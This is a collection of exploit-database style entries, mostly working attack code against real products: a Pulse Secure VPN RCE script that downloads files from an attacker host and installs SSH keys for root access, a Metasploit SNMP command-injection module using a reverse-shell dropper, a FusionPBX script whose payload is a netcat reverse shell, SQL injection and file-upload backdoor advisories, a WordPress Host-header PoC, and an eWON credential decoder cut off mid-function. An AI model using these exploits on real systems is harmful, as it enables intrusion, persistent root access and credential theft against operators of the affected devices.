
  1. # Exploit Title: Inventory Webapp SQL injection # Date: 05.09.2019 # Exploit Author: mohammad zaheri # Vendor Homepage: https://github.com/edlangley/inventory-webapp # Tested on: Windows # Google Dork: N/A ========= Vulnerable Page: ========= /php/add-item.php ========== Vulnerable Source: ========== Line39: $name = $_GET["name"]; Line39: $description = $_GET["description"]; Line39: $quantity = $_GET["quantity"]; Line39: $cat_id = $_GET["cat_id"]; Line49: if(mysql_query($itemquery, $conn)) (The four $_GET reads are all labelled "Line39"; they are presumably consecutive lines near line 39. The excerpt shows no validation or escaping between these reads and the call to the long-deprecated mysql_query(), which executes $itemquery.) ========= POC: ========= Note that $itemquery is the SQL string assembled server-side, not a request parameter: the injectable inputs are the GET parameters read above (name, description, quantity, cat_id), e.g. http://site.com/php/add-item.php?name=[SQL]&description=x&quantity=1&cat_id=1 Fix: build the query with prepared statements and bound parameters (mysqli or PDO) instead of concatenating request data into it. ========= Contact Me : ========= Telegram : @m_zhrii Email : neoboy503@gmail.com
#!/usr/bin/python
#
# Exploit Title: Pulse Secure Post-Auth Remote Code Execution
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 09/05/2019
# Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_)
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: linux
# CVE : CVE-2019-11539
#
# Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_)
#
# Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN
# Downloads Modified SSH configuration and authorized_keys file to allow SSH as root.
# You will need your own configuration and authorized_keys files.
#
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539
# Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
#
# Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authorization.
# We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free.
#
# NOTE(review): this is Python 2 only code -- it relies on urllib.quote_plus, str.encode("hex") and the
# print statement (see the final print in the main block). It will not run unmodified on Python 3.
# NOTE(review): every request is sent with verify=False, so the admin credentials and the session travel
# over an unverified TLS connection; acceptable for a lab appliance with a self-signed cert, but be aware
# that the traffic can be intercepted.
"""Post-auth command injection chain for Pulse Secure (CVE-2019-11539).

Flow: log in as admin -> abuse the tcpdump "options" field of diag.cgi to overwrite a template
(setcookie.thtml.ttc) with a Perl system() call -> request setcookie.cgi so the template is rendered
and the command runs. The main block uses that primitive to open a firewall port, fetch an sshd config
and authorized_keys from an attacker-controlled web server, install them and SIGHUP sshd.
"""
#
# Imports
import requests
import urllib
from bs4 import BeautifulSoup

# Host information -- all three placeholders below must be filled in before running.
host = ''  # Host to exploit
login_url = '/dana-na/auth/url_admin/login.cgi'  # Login page
CMDInjectURL = '/dana-admin/diag/diag.cgi'  # Overwrites the Template when using tcpdump
CommandExecURL = '/dana-na/auth/setcookie.cgi'  # Executes the code

# Login Credentials (this is a post-auth bug: a valid admin account is required)
user = 'admin'  # Default Username
password = 'password'  # Default Password

# Necessary for Curl
downloadHost = ''  # IP or FQDN for host running webserver
port = ''  # Port where web service is running. Needs to be a string, hence the quotes.

# Proxy Configuration
# Uncomment if you need to use a proxy or for debugging requests
proxies = {
    # 'http': 'http://127.0.0.1:8080',
    # 'https': 'http://127.0.0.1:8080',
}

# Headers for requests
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language':'en-US,en;q=0.5',
    'Accept-Encoding':'gzip, deflate',
    'Content-Type':'application/x-www-form-urlencoded',
}

# Cookies to send with request (select the admin realm / sign-in URL)
cookies = {
    'lastRealm':'Admin%20Users',
    'DSSIGNIN':'url_admin',
    'DSSignInURL':'/admin/',
    'DSPERSISTMSG':'',
}

# Data for post request
loginData = {
    'tz_offset': 0,
    'username': user,
    'password': password,
    'realm': 'Admin Users',
    'btnSubmit': 'Sign In',
}

s = requests.Session()  # Sets up the session (cookie jar shared by all later requests)
s.proxies = proxies  # Sets up the proxies

# Disable Warnings from requests library (the InsecureRequestWarning caused by verify=False)
requests.packages.urllib3.disable_warnings()

# Administrator Login logic
# Probably wouldn't have figured this out without help from @buffaloverflow
def adminLogin():
    """Log in to the admin realm with `user`/`password` and complete the "continue session" step.

    Side effects: populates the module-level session `s` with the authenticated cookies and sets
    the globals `xsAuth` (anti-CSRF token) and `_headers`.
    NOTE(review): if the login response is not a 302 to welcome.cgi (wrong credentials, lockout,
    different sign-in flow) nothing is printed and no error is raised -- the main block then goes on
    to call cmdInject() unauthenticated.
    """
    global xsAuth
    global _headers
    # Send the initial request (plain requests.get, not the session -- it only primes the realm cookies)
    r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies)
    print('[#] Logging in...')
    r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False)  # sends login post request
    print('[#] Sent Login Request...')
    # Login Logic: a successful login redirects to welcome.cgi, which may ask to continue an existing session
    if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""):
        referer = 'https://%s%s' %(host, r.headers["location"])  # Gets the referer
        r = s.get(referer, verify=False)  # Sends a get request
        soup = BeautifulSoup(r.text, 'html.parser')  # Sets up HTML Parser
        FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"]  # Gets DSIDFormDataStr
        print('[#] Grabbing xsauth...')
        xsAuth = soup.find('input', {'name':'xsauth'})["value"]  # Gets the cross site auth token
        print('[!] Got xsauth: ' + xsAuth)
        data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth}  # Submits the continue session page
        _headers = headers  # NOTE(review): aliases the module-level dict, so the update() below mutates `headers` too
        _headers.update({'referer':referer})  # Updates the headers
        r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies)  # Sends a new post request
        print('[+] Logged in!')

# Command injection logic
def cmdInject(command):
    """Run `command` on the appliance through the diag.cgi tcpdump-options injection.

    Fetches a fresh xsauth token from diag.cgi, sends the crafted "Start Sniffing" request (which
    writes the Perl system() payload over setcookie.thtml.ttc) and then requests setcookie.cgi so
    the overwritten template executes. Silently does nothing if diag.cgi does not answer 200.
    NOTE(review): `payload` below is built but never sent; the GET that follows rebuilds the same
    query string by hand with `command` inserted raw, while the DSLaunchURL cookie carries the
    quote_plus()-encoded form -- confirm against the target which encoding it expects before
    changing either.
    """
    r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies)
    if r.status_code == 200:
        soup = BeautifulSoup(r.text, 'html.parser')  # Sets up HTML Parser
        xsAuth = soup.find('input', {'name':'xsauth'})["value"]  # Gets the cross site auth token (local, shadows the global)
        payload = {
            'a':'td',
            'chkInternal':'On',
            'optIFInternal':'int0',
            'pmisc':'on',
            'filter':'',
            # -r<file> is a tcpdump option; the rest is interpreted by the Perl wrapper: $x="cmd",system $x
            # and the trailing '# 2>...' redirects stderr into the template file so the next render runs it.
            'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command,
            'toggle':'Start+Sniffing',
            'xsauth':xsAuth
        }
        # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie
        DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")}
        # print('[+] Sending Command injection: %s' %command)  # Useful for seeing what commands are run
        # Sends the get request to overwrite the template
        r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies)
        # Sends the get request to execute the code
        r = s.get('https://' + host + CommandExecURL, verify=False)

# Main logic
if __name__ == '__main__':
    adminLogin()
    try:
        print('[!] Starting Exploit')
        print('[*] Opening Firewall port...')
        cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT')  # Opens the port the replacement sshd config listens on (6667, see the ssh hint below)
        print('[*] Downloading Necessary Files....')
        cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config')  # download cloud_sshd_config
        cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys')  # download authorized_keys
        print('[*] Backing up Files...')
        cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak')  # backup cloud_sshd_config
        cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak')  # backup authorized_keys
        print('[*] Overwriting Old Files...')
        cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config')  # overwrite cloud_sshd_config
        cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys')  # overwrite authorized_keys
        print('[*] Restarting SSHD...')
        cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")')  # Restart sshd via a SIGHUP
        print('[!] Done Exploiting the system.')
        print('[!] Please use the following command:')
        # Python 2 print statement: the % is applied to the string, not to print()'s result.
        # On Python 3 this line raises TypeError (NoneType % str).
        print('[!] ssh -p6667 root@%s') %(host)
    except Exception as e:
        raise  # NOTE(review): re-raising unchanged makes this try/except a no-op
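##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# AwindInc / OEM wireless-presentation gateways: command injection through the SNMP
# firmware-upgrade FTP URL (camFWUpgradeFTPURL), which is handed unsanitised to ftpfw.sh.
# Requires a read-write SNMP community. Two writes are needed: one to store the URL
# (with the injected command) and one to the "start upgrade" OID that makes the device
# call /bin/getRemoteURL.sh with it.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SNMPClient
  include Msf::Exploit::CmdStager

  # camFWUpgradeFTPURL -- the OctetString that ends up in the ftpfw.sh command line.
  FTP_URL_OID = [1,3,6,1,4,1,3212,100,3,2,9,1,0].freeze
  # Setting this Integer32 to 1 starts the firmware download (and thus runs the injected command).
  TRIGGER_OID = [1,3,6,1,4,1,3212,100,3,2,9,5,0].freeze
  # The MIB fixes camFWUpgradeFTPURL at 255 bytes; the payload is padded to exactly this length.
  FTP_URL_LEN = 255

  def initialize(info={})
    super(update_info(info,
      'Name'           => "AwindInc SNMP Service Command Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs
        are fed to ftpfw.sh system command, leading to command injection. A valid SNMP read-write community
        is required to exploit this vulnerability.

        The following devices are known to be affected by this issue:

        * Crestron Airmedia AM-100 <= version 1.5.0.4
        * Crestron Airmedia AM-101 <= version 2.5.0.12
        * Awind WiPG-1600w <= version 2.0.1.8
        * Awind WiPG-2000d <= version 2.1.6.2
        * Barco wePresent 2000 <= version 2.1.5.7
        * Newline Trucast 2 <= version 2.1.0.5
        * Newline Trucast 3 <= version 2.1.3.7
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Quentin Kaiser <kaiserquentin[at]gmail.com>' ],
      'References'     => [
        ['CVE', '2017-16709'],
        ['URL', 'https://github.com/QKaiser/awind-research'],
        ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
      ],
      'DisclosureDate' => '2019-03-27',
      'Platform'       => ['unix', 'linux'],
      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
      'Privileged'     => true,
      'Targets'        => [
        ['Unix In-Memory',
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Type' => :unix_memory,
          'Payload' => { 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl'} }
        ],
        ['Linux Dropper',
          'Platform' => 'linux',
          'Arch' => ARCH_ARMLE,
          'CmdStagerFlavor' => %w[wget],
          'Type' => :linux_dropper
        ]
      ],
      'DefaultTarget'  => 1,
      'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}))

    register_options(
      [
        OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']),
      ])
  end

  # Reads sysDescr and reports Vulnerable for the Crestron AM-100/AM-101 (EOL, never fixed).
  # Any other description is reported Safe, and any SNMP/transport error Unknown.
  def check
    begin
      connect_snmp
      sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
      print_status("Target system is #{sys_description}")
      # AM-100 and AM-101 considered EOL, no fix so no need to check version.
      model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first
      case model
      when 'AM-100', 'AM-101'
        return CheckCode::Vulnerable
      else
        # TODO: insert description check for other vulnerable models (that I don't have)
        # In the meantime, we return 'safe'.
        return CheckCode::Safe
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
    Exploit::CheckCode::Unknown
  end

  # Writes +cmd+ into camFWUpgradeFTPURL with an SNMP SET.
  # Returns true only when the agent answered noError; false when the OID was not writable
  # or when the request failed (errors are printed, not raised, except Interrupt).
  def inject_payload(cmd)
    ok = false
    begin
      connect_snmp
      varbind = SNMP::VarBind.new(FTP_URL_OID, SNMP::OctetString.new(cmd))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Injection successful")
        ok = true
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
    ok
  end

  # Sets the "start firmware upgrade" OID to 1, which makes the device process the stored URL.
  def trigger
    begin
      connect_snmp
      varbind = SNMP::VarBind.new(TRIGGER_OID, SNMP::Integer32.new(1))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Trigger successful")
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
  end

  # Unix target sends the encoded command payload directly; the Linux target goes through
  # the wget CmdStager, which calls execute_command once per chunk.
  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  # Wraps +cmd+ in the FTP URL expected by ftpfw.sh, pads it to the MIB length, stores it and
  # triggers the download. Aborts (fail_with) when the wrapped command does not fit in
  # camFWUpgradeFTPURL or when the injection SET was rejected, so that a firmware download is
  # never triggered with a URL we did not control.
  def execute_command(cmd, opts = {})
    # The payload must start with a valid FTP URI otherwise the injection point is not reached
    cmd = "ftp://1.1.1.1/$(#{cmd.to_s})"
    # When the FTP download fails, the script calls /etc/reboot.sh and we loose the callback
    # We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and
    # keep our reverse shell opened :)
    cmd << "$(pkill -f /etc/reboot.sh)"
    # "A" * negative would raise ArgumentError; report the real problem instead.
    if cmd.length > FTP_URL_LEN
      fail_with(Failure::BadConfig, "Wrapped payload is #{cmd.length} bytes but camFWUpgradeFTPURL holds at most #{FTP_URL_LEN}; use a shorter payload or a smaller stager chunk")
    end
    # the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad
    cmd << "A" * (FTP_URL_LEN - cmd.length)
    # we inject our payload in camFWUpgradeFTPURL
    print_status("Injecting payload")
    unless inject_payload(cmd)
      fail_with(Failure::NoAccess, "Payload injection via SNMP SET failed; not triggering the firmware download")
    end
    # we trigger the firmware download via FTP, which will end up calling this
    # "/bin/getRemoteURL.sh %s %s %s %d"
    print_status("Triggering call")
    trigger
  end
end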
  4. #!/usr/bin/perl -w # # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # # Type: Remote # Risk: High # # Solution: # Set security headers to web server and no-cache for Cache-Control # # Simple Attack Scenarios: # # o This attack can bypass Simple WAF to access restricted content on the web server, # something like phpMyAdmin; # # o This attack can deface the vulnerable Wordpress website with content from the default vhost; # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! 
# # # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # # ==================================================================================== # # Author: Todor Donev 2019 (c) <todor.donev at gmail.com> # # > Host => default-vhost.com # # > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) # # > Content-Type => application/x-www-form-urlencoded # # < Connection => close # # < Date => Fri, 06 Sep 2019 11:39:43 GMT # # < Location => https://default-vhost.com/ # # < Server => nginx # # < Content-Type => text/html; charset=UTF-8 # # < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT # # < Client-Peer => 13.37.13.37:443 # # < Client-Response-Num => 1 # # < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3 # # < Client-SSL-Cert-Subject => /CN=default-vhost.com # # < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384 # # < Client-SSL-Socket-Class => IO::Socket::SSL # # < Client-SSL-Warning => Peer certificate not verified # # < Client-Transfer-Encoding => chunked # # < Strict-Transport-Security => max-age=31536000; # # < X-Powered-By => PHP/7.3.9 # # < X-Redirect-By => WordPress # # ==================================================================================== # # # use strict; use v5.10; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; my $host = shift || ''; my $attacker = shift || 'default-vhost.com'; say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # ==================================================================================== # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>"; if ($host !~ m/^http/){ say "# e.g. 
perl $0 https://target:port/ default-vhost.com"; exit; } my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new( protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 } ); $browser->timeout(10); $browser->agent($user_agent); my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " "); $request->header("Host" => $attacker); my $response = $browser->request($request); say "# 401 Unauthorized!\n" and exit if ($response->code eq '401'); say "# > $_ => ", $request->header($_) for $request->header_field_names; say "# < $_ => ", $response->header($_) for $response->header_field_names; say "# ====================================================================================";
  5. ##################################################################################### # Exploit Title: [PUBLISURE : From 0 to local Administrator (3 vulns) exploit-chain] # Google Dork: [N/A] # Date: [05/09/2019] # Exploit Author: [Bourbon Jean-Marie (@kmkz_security) - Hacknowledge company] # Vendor Homepage: [https://www.publisure.com/] # Software Link: [N/C] # Version: [version 2.1.2] # Tested on: [Windows 7 Enterprise] # CVE : [CVE-2019-14252, CVE-2019-14253, CVE-2019-14254] ##################################################################################### # Improper Access Control # # CVSSv3: 7.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) # OVE ID: OVE-20190724-0002 # CVE ID: CVE-2019-14253 # ##################################################################################### # (Pre-Authentication) Multiple SQL injections # # CVSSv3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N) # OVE ID: OVE-20190724-0003 # CVE ID: CVE-2019-14254 # ##################################################################################### # Unrestricted File Upload RCE # # CVSSv3: 9.1 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) # OVE ID: OVE-20190724-0004 # CVE ID: CVE-2019-14252 # ##################################################################################### # Fixes: # Upgrade to the latest product version and/or contact support for patches (no fix was confirmed by the vendor; see timeline) ##################################################################################### I. PRODUCT Publisure Hybrid mail is a highly efficient and cost effective alternative to traditional methods of producing and posting correspondence within an organization. The Publisure system can either be used for centralized, internal production within your existing facilities or alternatively, it can be implemented as a fully outsourced solution. Note that this advisory is based on version 2.1.2, which is a legacy version: a newer release exists, but whether it is affected was not confirmed. II.
ADVISORY A combination of three different vulnerabilities permits an unauthenticated attacker to gain Administrator access on the server hosting the Publisure application. III. VULNERABILITIES DESCRIPTIONS a) The first issue is an authentication bypass: the PHP scripts in the /AdminDir folder, which should be restricted, can be requested and will execute their queries without any session. b) The second weakness is that SQL queries are built from unsanitized input, resulting in multiple SQL injections in the "userAccFunctions.php" functions. Combining these two steps, an attacker can read password hashes and/or grant the "user" account additional rights in order to become "Administrator" (for example). c) Once authenticated as an administrator, the attacker can upload a PHP backdoor through the "adminCons.php" form. The file is stored in the E:\PUBLISURE\webservice\webpages\AdminDir\Templates\ folder and remains there even after it is removed from the "adminCons.php" view, which lets the attacker hide the malicious PHP file. IV. PROOF OF CONCEPT a) Access to AdminDir PHP scripts and database querying is possible without authentication (ex: http://192.168.13.37/AdminDir/editUser.php?id=2) b) Vulnerable URL example: http://192.168.13.37/AdminDir/editUser.php?id=sqli "editUser.php" vulnerable code: $user = getUserDtails($_GET['id']); "userAccFunctions.php" vulnerable code example (note that $id is interpolated unquoted into the WHERE clause, so no quote is even needed to break out): function getUserDtails($id) { global $db; //The reseller_accounts table has been used to store department information since PDQit $Q = "SELECT a.username as username,a.contact_firstname,a.contact_lastname,a.email,r.company_name, a.enabled, a.record_id, a.password, a.unique_identifier, a.reseller_id, a.approval, a.resourceEditType, a.docView FROM accounts a, reseller_accounts r WHERE r.record_id = a.reseller_id AND a.record_id = $id"; $R = $db->query($Q); return $R; } c) The "adminCons.php" form accepts arbitrary file uploads, leading to RCE, and lets the attacker hide malicious PHP code stored within the "/AdminDir/Templates" folder (ex:
http://192.168.13.37/AdminDir/Templates/tata.php?c=whoami) V. RECOMMENDATIONS a) Enforce authentication and authorization server-side on every script in the administrative (and other) folders; do not rely on the UI hiding the links. b) Use prepared statements with bound parameters (PDO or mysqli) so that request data is never concatenated into SQL; casting id to an integer is only a stopgap. c) Validate uploads on the upload forms by allow-listing permitted extensions and content types, ignore the client-supplied filename, and store templates outside the web root or deny script execution in /AdminDir/Templates so that an uploaded PHP file cannot be executed. VI. TIMELINE July 23rd, 2019: Vulnerability identification July 30th, 2019: First contact with the editor (Publisure) and vulnerabilities acknowledgement August 13th, 2019: Contact to vendor to ask for fix - no reply September 04th, 2019: Vendor was informed 24h before public disclosure September 05th, 2019: public disclosure after 45 days VII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this advisory. The applied disclosure policy is based on US CERT Responsible Disclosure Policy - https://www.us-cert.gov/vulnerability-disclosure-policy
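#!/usr/bin/python3
'''
# Exploit Title: FusionPBX v4.4.8 Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage: https://www.fusionpbx.com
# Software link: https://www.fusionpbx.com/download
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2

Authenticated RCE: the "services" app lets a logged-in user define a service whose
start command is executed by the server. This script logs in, creates such a service
with a reverse-shell start command pointing at ip:port, looks the new service up in
the service list and starts it.
'''
import sys
import warnings

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from bs4 import BeautifulSoup

# turn off BeautifulSoup and requests warnings (verify=False is used for self-signed installs)
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Name of the service created on the target; it is also how the entry is found again afterwards.
SERVICE_NAME = "PwnedService3"


def build_reverse_shell(ip, port):
    """Return the service start command: an interactive /bin/sh piped to nc at ip:port via a FIFO.

    ip and port are inserted verbatim; they come from the command line, not from the target.
    """
    return "rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc %s %s >/tmp/z" % (ip, port)


def find_service_id(html, name):
    """Return the id= value of the first link in the services page whose text is exactly `name`.

    Returns None when no such link exists (e.g. the service was not created).
    """
    soup = BeautifulSoup(html, "lxml")
    for a in soup.find_all(href=True):
        # Tag containment: matches a link whose sole content is the service name.
        if name in a:
            return a["href"].split("=")[1]
    return None


def main(argv):
    """Run the full chain. Exits non-zero on bad usage, failed login or a missing service entry."""
    if len(argv) != 6:
        print(len(argv))
        print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
        print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")
        sys.exit(1)

    url, username, password, ip, port = argv[1:6]
    url = url.rstrip("/")  # tolerate a trailing slash; every path below starts with "/"

    session = requests.session()
    login_request = session.post(
        url + "/core/user_settings/user_dashboard.php",
        {"username": username, "password": password},
        verify=False
    )
    # Original behaviour continued after a failed login; nothing below can work without a session.
    if "Invalid Username and/or Password" in login_request.text:
        print("[+] Error with creds")
        sys.exit(1)
    print("[+] Logged in successfully")

    service_edit_page = url + "/app/services/service_edit.php"
    services_page = url + "/app/services/services.php"

    payload_info = {
        "service_name": SERVICE_NAME,
        "service_type": "pid",
        "service_data": "1",
        # Start command = the payload. Originally hard-coded to 172.0.1.3:1337 even though
        # ip/port were taken from the command line; they are now actually used.
        "service_cmd_start": build_reverse_shell(ip, port),
        "service_cmd_stop": "stop",
        "service_description": "desc",
        "submit": "Save"
    }
    session.post(service_edit_page, payload_info, verify=False)

    html_page = session.get(services_page, verify=False)
    sid = find_service_id(html_page.text, SERVICE_NAME)
    if sid is None:
        # Previously this fell through to a NameError on `sid`.
        print("[-] Service %s not found on %s; the service was not created (insufficient rights?)" % (SERVICE_NAME, services_page))
        sys.exit(1)

    service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
    print("[+] Triggering the exploit , check your netcat !")
    session.get(service_page, verify=False)


if __name__ == "__main__":
    main(sys.argv)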
#!/usr/bin/env python
'''
# Exploit Title: eWON v13.0 Authentication Bypass
# Date: 2018-10-12
# Exploit Author: Photubias – tijl[dot]Deneut[at]Howest[dot]be for www.ic4.be
# Vendor Advisory: [1] https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0
#                  [2] https://websupport.ewon.biz/support/news/support/ewon-security-vulnerability
# Vendor Homepage: https://www.ewon.biz
# Version: eWon Firmware 12.2 to 13.0
# Tested on: eWon Flexy with Firmware 13.0s0

Copyright 2019 Photubias(c)

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.

File name eWON-Flewy-Pwn.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

This script will perform retrieval of clear text credentials for an eWON Flexy router
Tested on the eWON Flexy 201 with Firmware 13.0s0
Only requires a valid username (default = adm) and this user must have the Rights 'View IO' & 'Change Configuration'
It combines two vulnerabilities: authentication bypass (fixed in 13.1s0) and a weak password encryption,
allowing cleartext password retrieval for all users (fixed in 13.3s0)

NOTE(review): Python 2 only (urllib2, raw_input, str/bytes mixing in the hex helpers).
NOTE(review): the device is contacted over plain HTTP; usernames and the recovered passwords
travel in clear on the wire.
'''
username = 'adm'  # account name sent in the Basic-auth header; no password is ever sent
import urllib2,urllib,base64,binascii,os

def decode(encpass):
    """Print the clear-text password hidden in an eWON "encrypted" password field.

    The stored value is base64; after decoding, the last 2 bytes are dropped and the rest is
    XORed nibble-by-nibble with the fixed key `xorString` (19 bytes, hence the 19-character limit).
    Values of the form "#_<x>_<base64>" are unwrapped first. Prints the result; returns None.
    Calls exit() (not an exception) when the decoded blob is longer than the key.
    """
    xorString = "6414FE6F4C964746900208FC9B3904963A2F61"  # static XOR key, identical on every device tested
    def convertPass(password):
        # `password` is a hex string; len/2 is the byte length.
        if (len(password)/2) > 19:
            print('Error, password can not exceed 19 characters')
            exit()
        return hexxor(password, xorString[:len(password)])
    def hexxor(a, b):
        # XOR two equal-length hex strings one hex digit at a time; zip() truncates to the shorter.
        return "".join(["%x" % (int(x,16) ^ int(y,16)) for (x, y) in zip(a, b)])
